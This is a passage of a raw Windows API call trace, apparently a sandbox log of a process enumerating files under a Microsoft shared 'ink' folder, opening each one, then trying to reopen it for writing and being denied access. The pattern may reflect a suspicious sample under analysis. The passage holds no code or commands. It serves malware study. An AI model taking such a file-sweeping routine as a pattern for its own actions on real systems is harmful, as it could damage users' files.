returned 1 [0100.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0100.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0100.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0100.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0100.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0100.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0100.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cce0 [0100.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0100.256] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.256] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.256] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.256] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cce0 | out: hHeap=0x20000) returned 1 [0100.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.256] AreFileApisANSI () returned 1 [0100.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0100.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0100.256] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.256] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0100.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0100.257] AreFileApisANSI () returned 1 [0100.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85da0 [0100.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x85da0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui") returned 73 [0100.257] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.257] GetFileType (hFile=0x27c) returned 0x1 [0100.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85da0 | out: hHeap=0x20000) returned 1 [0100.257] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.257] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.258] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.258] CloseHandle (hObject=0x27c) returned 1 [0100.258] AreFileApisANSI () returned 1 [0100.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85ee0 [0100.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x85ee0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui") returned 73 [0100.258] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.258] GetLastError () returned 0x5 [0100.258] GetLastError () returned 0x5 [0100.258] SetLastError (dwErrCode=0x5) [0100.258] GetLastError () returned 0x5 [0100.258] SetLastError (dwErrCode=0x5) [0100.258] GetLastError () returned 0x5 [0100.258] SetLastError (dwErrCode=0x5) [0100.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85ee0 | out: hHeap=0x20000) returned 1 [0100.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0100.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0100.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0100.258] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.258] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.259] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8c460, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧Ḁ")) returned 0 [0100.259] FindClose (in: hFindFile=0x78410 | out: hFindFile=0x78410) returned 1 [0100.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0100.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0100.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0100.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0100.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0100.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0100.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0100.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0100.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0100.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0100.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0100.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0100.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0100.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0100.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fbb8 [0100.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0100.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0100.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0100.259] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.259] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.259] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.259] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0100.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.260] AreFileApisANSI () returned 1 [0100.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel", lpUsedDefaultChar=0x0) returned 65 [0100.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0100.260] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.260] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.260] AreFileApisANSI () returned 1 [0100.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0100.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82688 [0100.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x82688, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel") returned 65 [0100.260] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\languagemodel"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.260] GetLastError () returned 0x5 [0100.260] GetLastError () returned 0x5 [0100.260] SetLastError (dwErrCode=0x5) [0100.260] GetLastError () returned 0x5 [0100.260] SetLastError (dwErrCode=0x5) [0100.260] GetLastError () returned 0x5 [0100.260] SetLastError (dwErrCode=0x5) [0100.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82688 | out: hHeap=0x20000) returned 1 [0100.260] AreFileApisANSI () returned 1 [0100.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0100.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82688 [0100.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x82688, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel") returned 65 [0100.261] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\languagemodel"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.261] GetLastError () returned 0x5 [0100.261] GetLastError () returned 0x5 [0100.261] SetLastError (dwErrCode=0x5) [0100.261] GetLastError () returned 0x5 [0100.261] SetLastError (dwErrCode=0x5) [0100.261] GetLastError () returned 0x5 [0100.261] SetLastError (dwErrCode=0x5) [0100.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82688 | out: hHeap=0x20000) returned 1 [0100.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0100.261] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.261] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.261] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.261] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0100.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f9a8 [0100.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0100.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b110 [0100.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0100.261] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076b52b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0100.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0100.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0100.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0100.262] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78150 [0100.262] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076afd8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.262] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3fbc74, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="chstic.dgml", cAlternateFileName="")) returned 1 [0100.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0100.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a6f8 [0100.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46128 [0100.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0100.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0100.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0100.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0100.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0100.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aa88 [0100.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x4ebc8 [0100.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0100.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c650 [0100.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0100.263] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.263] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.263] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.263] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0100.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.263] AreFileApisANSI () returned 1 [0100.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml", lpUsedDefaultChar=0x0) returned 77 [0100.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0100.263] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.263] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0100.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.263] AreFileApisANSI () returned 1 [0100.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0100.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c5a8 [0100.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x8c5a8, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml") returned 77 [0100.263] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\languagemodel\\chstic.dgml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.263] GetFileType (hFile=0x27c) returned 0x1 [0100.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0100.264] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.264] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.264] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.264] CloseHandle (hObject=0x27c) returned 1 [0100.265] AreFileApisANSI () returned 1 [0100.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0100.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8cce0 [0100.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x8cce0, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml") returned 77 [0100.265] 